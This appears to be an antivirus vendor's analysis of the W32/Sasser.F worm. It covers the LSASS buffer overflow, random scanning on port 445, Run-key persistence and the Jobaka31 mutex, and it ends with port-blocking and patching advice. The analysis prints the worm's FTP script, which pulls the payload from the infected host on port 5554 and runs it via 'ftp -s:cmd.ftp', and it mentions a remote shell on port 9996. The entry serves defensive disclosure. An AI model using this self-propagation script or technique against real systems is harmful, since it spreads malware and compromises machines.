W32/Sasser.F!worm

Analysis

Specifics
This 32-bit virus has a packed file size of 74,752 bytes - it appears to be a rehash of W32/Sasser.A-net, with only minor changes. This threat takes advantage of a vulnerability of a buffer overflow in Local Security Authority Subsystem Service (LSASS) [ref: MS04-011 http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx].

The buffer overrun exists because of an unchecked buffer in the Local Security Authority Subsystem Service. This service is responsible for managing local security, domain authentication, and Active Directory processes. It handles authentication for the client and for the server. It also contains features that are used to support Active Directory utilities.

The virus will bind with TCP port 5554 and act as an FTP server. The virus will then send SYN packets to random IP addresses across the Internet to destination TCP port 445. IP addresses which are live will respond with an "ACK" packet. The virus will then target that IP address by initiating its LSASS exploit code in an effort to gain access to that system. If the target can be compromised, the virus will write into the IPC$ share an FTP script file which will request the virus from the infected system. The virus is downloaded from the infected system from TCP port 5554 to the target. The file received will then be executed, and the cycle will continue.

Loading At Windows Startup
If this virus is run, it will copy itself to the Windows folder and register itself to run at each Windows startup -

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
"napatch.exe" = C:\WINNT\napatch.exe

While the virus is memory resident, it creates a Mutex reference named "Jobaka31".

Virus Delivery Through FTP
On an infected system, the virus may write files with random names, but a specific format into the System32 folder, such as these -

98723_up.exe
23712_up.exe
56919_up.exe

The virus will bind to TCP port 5554 and use this channel to operate an FTP emulation. The virus creates a file "c:\win.log" and writes the infected system IP address into this file. If the virus is able to compromise a target, it will open a remote shell on the target on TCP port 9996. Next the virus will write an FTP script file as "cmd.ftp" with the following instructions -

open undefinedIP Address of infected systemundefined 5554
anonymous
user
bin
get #####_up.exe
bye

Where ##### is the actual prefix of the file name such as "98723". The virus remotely executes the FTP script using the instruction "ftp -s:cmd.ftp". When the file is retrieved to the target system, it is then executed and the "cmd.ftp" script is then deleted.

Recommended Action

• Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
  
• Using the FortiGate manager, block internal to external traffic using UDP ports 135, 137, 138, and 445, and TCP ports 135, 139, 445, 593, 5554 and 9996
  
• For Windows XP users, implement use of Personal Firewall - this feature automatically blocks unsolicited inbound traffic and would protect against this Internet worm
  
• Ensure affected systems are updated with the latest Microsoft security patches, and specifically the update which addresses this vulnerability in MS04-011 [http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx]